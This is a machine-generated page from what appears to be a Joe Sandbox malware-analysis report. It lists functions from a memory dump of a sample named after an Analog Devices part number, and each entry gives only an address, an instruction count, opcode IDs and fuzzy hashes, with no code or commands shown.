Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018a3655b4190f7b39df29b27a14c96bd2e28a6bfd987a02124f5eb4d1c24c06
Instruction ID: fb26a004178b57e28be7254e8682c7229cada47b4c49f88caac38235423c3832
Opcode Fuzzy Hash: 018a3655b4190f7b39df29b27a14c96bd2e28a6bfd987a02124f5eb4d1c24c06
Instruction Fuzzy Hash: 08913471A00212CFEB26DB6CC884B7EFBB5EF94714F2580A9EE059B349EA34D941C751

Function 01756ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
Instruction ID: ee77cf0acf567c60df56e83df41f5b695e3bf0619db1d25552435c864c92ab28
Opcode Fuzzy Hash: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
Instruction Fuzzy Hash: 2281A271E006169BDB68CF69C940ABEFBF9FB48700F54852EE845E7640E774E940CBA4

Function 017CAB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: 50559d20320d53766b0e260b6ad0a59367743853dbe85830a25623bde41758d4
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: 6C819231A0020A9FDF19CF98C894AAEFBB2FF84711F14856DD9169B349EB74E941CB40

Function 0173E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
Instruction ID: e5a1e8641521cbd73c05cd82ab2836c37dd5263f05139c3958f1ab554f4258fc
Opcode Fuzzy Hash: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
Instruction Fuzzy Hash: 9A814F71A01609AFDB26CFA9C880BEEFBB9FF88354F144429E555A7251DB30AC45CB60

Function 0171C640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed46a224f1015df1828c700d1400afc86f35b3daa40f28f944062b65074e518
Instruction ID: c16b63643c7e9bdf6f5bd09e36b8e12c42c96dc2d13b5ae72b030ea3cb44e71e
Opcode Fuzzy Hash: 1ed46a224f1015df1828c700d1400afc86f35b3daa40f28f944062b65074e518
Instruction Fuzzy Hash: E871ACB5D04629DBCB26CF98D9907BEFBB4FF68710F14815AE942AB354D3709840CBA1

Function 017B47A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
Instruction ID: 9cabe81d5136d850519b89ed0125765eb21bec7d6aa6ec44821e65d6f155ece7
Opcode Fuzzy Hash: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
Instruction Fuzzy Hash: 44714F70900205EFDB20DF69D984B9BFBF9FF94710B10815EF616AB29AD7319A80CB54

Function 0171260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
Instruction ID: 99d1bedf9b3c4163c0eeb06cf2159b00ecc631b9ca2105e5542decf5b76baff8
Opcode Fuzzy Hash: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
Instruction Fuzzy Hash: B371CF316042428FD312DF2CC484B6AF7E5FF84710F1489AAE899CB79ADB34D946CB91

Function 0178035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: bd5cfff25251d3f4a39021122cf67e17fad37dda0e4090d1e5600d1f5578f8ba
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: F5716E71E40619AFDB10EFA9C944E9EFBB9FF48710F104569E505A7254DB30EA05CBA0

Function 017962A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779a934f00c2ba065e6c8aacdde6395cd6e2da8c502bfbcfc126f7cd4bc7ff82
Instruction ID: 808e3dd7e367092b75551fb922a73e1b381ceb74b1a4bd8a668750aad2398f97
Opcode Fuzzy Hash: 779a934f00c2ba065e6c8aacdde6395cd6e2da8c502bfbcfc126f7cd4bc7ff82
Instruction Fuzzy Hash: C471F332240B01AFEB32DF58D844F5AFBA6EF44760F154A28F2558B2A1D775E948CB50

Function 01708AA0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28eed0c745bd21a56208f9b36ebfc4180575cc36b2e59dc97777529496321b66
Instruction ID: 2077be0d47647c9a82108629f37936c71c968d25ce82f686d2d34bb8d17a4893
Opcode Fuzzy Hash: 28eed0c745bd21a56208f9b36ebfc4180575cc36b2e59dc97777529496321b66
Instruction Fuzzy Hash: 9F818D72A08706CFDB25CF9CD488BAEF7F5AB48320F1A416DD905AB286D7749D40CB94

Function 017D8324 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1bd777f0419019d091498fdf8bac0f4031afe8f5cc4535c20e63485976474d
Instruction ID: 95d3018e74ff904fd6dce169ce5007e426582a79b2bceaf0da9de32df5791529
Opcode Fuzzy Hash: bc1bd777f0419019d091498fdf8bac0f4031afe8f5cc4535c20e63485976474d
Instruction Fuzzy Hash: 88712971E0020AAFDF16DF94C845FEEFBB8FB04350F104269F625A6294E774AA05CB91

Function 017BA250 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be03cf9397151ec9a24f0c186e7e9d9892a7b5dbd0f63fbd49075e437b7ab5d8
Instruction ID: a5e4007127f5d78264ed5d88bc312fa93305c11660183544246550d144a91eae
Opcode Fuzzy Hash: be03cf9397151ec9a24f0c186e7e9d9892a7b5dbd0f63fbd49075e437b7ab5d8
Instruction Fuzzy Hash: 3F51B072504712AFD722EE68C888F9BFBE8EBC5750F010929BA41DB254D774ED05C7A2

Function 017A8350 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78ee39bb4521c77f460e72a6a0398f3b94781f4cb165ecbebf19df5e4d35ff5
Instruction ID: f55a6b2ece97e0c5e702a7677af9c9b68bf640020e86cfd6cea01798277412f7
Opcode Fuzzy Hash: a78ee39bb4521c77f460e72a6a0398f3b94781f4cb165ecbebf19df5e4d35ff5
Instruction Fuzzy Hash: 8851DF70900705DFD721CFAAC884AABFBF8BF94710F50471EE292976A1D7B0A545CB91

Function 0173E443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78dfb68efb2a7047b9b2c599779d4c29d823840b71607a67d40059aec9b06e99
Instruction ID: f3e8e62940a83250cb001971d7d65735ecdac0d0d02cdd1b8e9a6c4c22780ba4
Opcode Fuzzy Hash: 78dfb68efb2a7047b9b2c599779d4c29d823840b71607a67d40059aec9b06e99
Instruction Fuzzy Hash: 78518E71200A05DFCB22EF69C984E6AF3F9FF58764F500869E652972A5EB30ED50CB50

Function 017A4180 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c09b469f35cb1a9773b04c32f0ad579ffd200bd5564657117c4f1ee0166fa1
Instruction ID: 5e3c645021e5f4a388a7f6ba93a7538779f0becc4c385aa720ba93a3ea6c144e
Opcode Fuzzy Hash: e5c09b469f35cb1a9773b04c32f0ad579ffd200bd5564657117c4f1ee0166fa1
Instruction Fuzzy Hash: 715178716083429FD754DF29C880A6BFBE5BFC8204F884A2DF58AD7250EB71D905CB52

Function 017245B1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction ID: 15d9036c8e9e1283e41b0ac916d65212cfdb873b8b9646d4d0eab5d018269d02
Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction Fuzzy Hash: F0518E71E0022AABDF15DF98C444BEEFBB9AF45754F044069EA12AB340D774DE46CBA0

Function 0178E9E0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
Instruction ID: c2da005217fa9d870a930ee6ab29c444a61e2cb4ff2c81ca40208f19ca2db028
Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
Instruction Fuzzy Hash: 9A51A571D4021AEFEF21BA94C894FAEFFB5AB00724F154665E912A7190DB309E408BA1

Function 017C8B28 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd74dbe4085ad589ca66ca1e99db9ec6e7edd4b482a8e1533fc45d2607ffbfed
Instruction ID: d6d5284e08e388793c2ae7d78ff5cc0ff3b8fbf5ceeabe8def892b165331099f
Opcode Fuzzy Hash: fd74dbe4085ad589ca66ca1e99db9ec6e7edd4b482a8e1533fc45d2607ffbfed
Instruction Fuzzy Hash: 2541D3707016119BDB29DF2DC894B7BFB9AEF90B20F08826DE95587385DB34D841C792

Function 0178CBF0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bcae392893c6744df3367b4419753cda141617796c9a980009e10a40c472c20
Instruction ID: 1ea5c0bada9107cbc744137770fe2095acf14d0861999b8fce1355d42b4492aa
Opcode Fuzzy Hash: 1bcae392893c6744df3367b4419753cda141617796c9a980009e10a40c472c20
Instruction Fuzzy Hash: 67517D71940216DFCB21EFA9C98499EFBF9FB48364B118559E545A3305D730AD41CFA0

Function 017CA9D3 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
Instruction ID: 3d69f916b2ffd5a001b700e8a8ab1e44070176bb927c35d2d8c4f79d81335abc
Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
Instruction Fuzzy Hash: C241E471A0171A9FCB25CF2CC984A6EF7A9FF80711B04466EEA1287644FB30EE04C790

Function 017301F8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cff1fafbb2b6262fc7c608b722e0fdcaa2a20797f5edb5d7e162de4d44b416ac
Instruction ID: 592fc6a2806f31590202d160ad7505dee31c213440b6bfbefda281c554f239aa
Opcode Fuzzy Hash: cff1fafbb2b6262fc7c608b722e0fdcaa2a20797f5edb5d7e162de4d44b416ac
Instruction Fuzzy Hash: B341BC76900219DBDB14DF98C440AEEFBB5BF88710F15816EF815E7242D7359D41CBA4

Function 0172EBFC Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb4df9de518a554208e65ae46f50680bc87d8d798fa9db6b5e04f3c41ef9879
Instruction ID: 42eab67ea0241ea663dab15fdcd66db2e2ad1f72fbce5d19c1fadb7932859f89
Opcode Fuzzy Hash: 2cb4df9de518a554208e65ae46f50680bc87d8d798fa9db6b5e04f3c41ef9879
Instruction Fuzzy Hash: BD41E0712043029FD724DF68C894A6BF7F9FF98224F10486EE957C721AEB30E8858B51

Function 01742750 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction ID: b16a27edc2de45e5849bc1542899308315e3fded781d949c14cd95511e00f570
Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction Fuzzy Hash: 9E515B75A00219DFEB15CF9CC480AAEF7B2FF84710F2881A9D915A7355D771AE82CB90

Function 01706154 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 304aaad47853366c808ab8b0091f952d5fd939299fbf6f050b488d1ca23c9880
Instruction ID: 2f4f48c969f7da1a85577c645d8b94351aea3deb2477f40ada7d023a2d5a154b
Opcode Fuzzy Hash: 304aaad47853366c808ab8b0091f952d5fd939299fbf6f050b488d1ca23c9880
Instruction Fuzzy Hash: A9510770944207DBDB269B28CC14BE9FBF5EF15314F1482A9F515A72C6D7349991CF40

Function 01700BCD Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b669442cab7b3c4ced815726c914ea6829e2dd5980536c27e36a935212f710a9
Instruction ID: 5620a4775f7f90f4d69c3c85987f42a0d148247d80775bd1c3499b5458a28416
Opcode Fuzzy Hash: b669442cab7b3c4ced815726c914ea6829e2dd5980536c27e36a935212f710a9
Instruction Fuzzy Hash: 5A418135A00329DBDB62DF6CC944BEEF7B4EF45750F0100A5E909AB285DB749E84CB91

Function 017C866E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: 91a919ff98ec1fe4ea28c9ea15694e488174c5ed2179689065058b64215f3de2
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: 0A418275B10205ABEB15DF99CC84AAFFBBAAF88B10F14406DE905A7346DB70DD0187A1

Function 01700887 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c9ff779b95b162d596395160e79409c4712d32473fee93b871e31b31a695463
Instruction ID: e265ebd012e02c10802f4760ab1c6e04e5313c8c16d61068b9de681e617e0be1
Opcode Fuzzy Hash: 2c9ff779b95b162d596395160e79409c4712d32473fee93b871e31b31a695463
Instruction Fuzzy Hash: F741B0B0610701DFE326CF28C480A22F7F9FF49364B208A6EE54786A91E730E945CB90

Function 0172A470 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b1e391406678e44e46eb85d650f85d45fe7a10628ccc28712a0609187fd565
Instruction ID: 22a69de63cf084b10996ad514bb086b646eb2ca9d919438d93ef7dcb721e2be2
Opcode Fuzzy Hash: b3b1e391406678e44e46eb85d650f85d45fe7a10628ccc28712a0609187fd565
Instruction Fuzzy Hash: 8141E131944225CFDB25DF6CC894BAFFBB4FB18320F284199D412AB699DB34D941CBA0

Function 01708BF0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8a448e30f732d6d821ce4b23eddc86695c8a61fc96c0e99830fdeeffa67007
Instruction ID: 7f13eeb1e3c99444224a2fa5f83528c8beafeffe246538c23cdb3bc658565840
Opcode Fuzzy Hash: cc8a448e30f732d6d821ce4b23eddc86695c8a61fc96c0e99830fdeeffa67007
Instruction Fuzzy Hash: 28411371E00302CBD7269F58C884A6BFBF5FB98714F18816ED9069B29AC775D842CF91

Function 016F8918 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63e0d673d0ba635a7fbab8524d19a38297a243c02c344d933b70171899839f2e
Instruction ID: 60abe40a9f2e88300a9c7cc2d86cd03f0d908ee7709cf7bf30d3189a065c6198
Opcode Fuzzy Hash: 63e0d673d0ba635a7fbab8524d19a38297a243c02c344d933b70171899839f2e
Instruction Fuzzy Hash: 9D4148315083569ED312DF69C840A6BF7E9EF88B54F40096EFA94D7250E770DE058BA3

Function 016FA020 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction ID: 54129f60a41e852bbda44821b036c2cdccc95cce803d2a840ace0630cafec71e
Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction Fuzzy Hash: 82413B31A00211EBDB51DEA898407BAFB73EB50759F15806EEE498B280D7768D41CB90

Function 017009AD Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c4c796fc33549d8a875d490f81ffbfca8cceb85695ed0f3f2fccb57d5dad4dd
Instruction ID: 5152e729e93c0fcea7f4ce654d6b3fa2fe17ebaf1ecf8ecf86ba1b026262a3ff
Opcode Fuzzy Hash: 5c4c796fc33549d8a875d490f81ffbfca8cceb85695ed0f3f2fccb57d5dad4dd
Instruction Fuzzy Hash: BC415AB1640701EFD722CF18C844B26FBE5FF58364F24866AE4498B291E771EA41CB90

Function 01730710 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
Instruction ID: f4522b704db7af58f511133d8ad503ba2a1cf65585b23bc192468f7ac032465e
Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
Instruction Fuzzy Hash: 5E410875A00605EFDB25CF98C980AAAFBF4FF58704B10496DE656D7652D330EA44CF90

Function 0170262C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb7a6e504b798e8137665428c36c57f92f7884d5552924955895cccc628afed
Instruction ID: 60f22c6ef5e23498fec39b0927e95c9ea72d6896849194224703a1213ecd7bff
Opcode Fuzzy Hash: ecb7a6e504b798e8137665428c36c57f92f7884d5552924955895cccc628afed
Instruction Fuzzy Hash: 7441B0B2541705DFC722EF28C908665F7F1FF58320F1081ADD6069B6E6DB30A941CB51

Function 0173C8F9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1f94e8799ed9d49e905c0a2a7f40a0430a3282423b300ec0ec0ef628e245ce
Instruction ID: 6621d2dfbe5a290b8fec52d298ea3a63c9ffb366a263b5bfc5830400a797aa42
Opcode Fuzzy Hash: da1f94e8799ed9d49e905c0a2a7f40a0430a3282423b300ec0ec0ef628e245ce
Instruction Fuzzy Hash: 213177B2A00349DFDB12CFA8C440799FBF0EB49724F2181AED519EB252D3729902CB90

Function 017807C3 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02809f48ff5c5e56416546f128f9c71117dc70fe9f854c359580159fe4a2f594
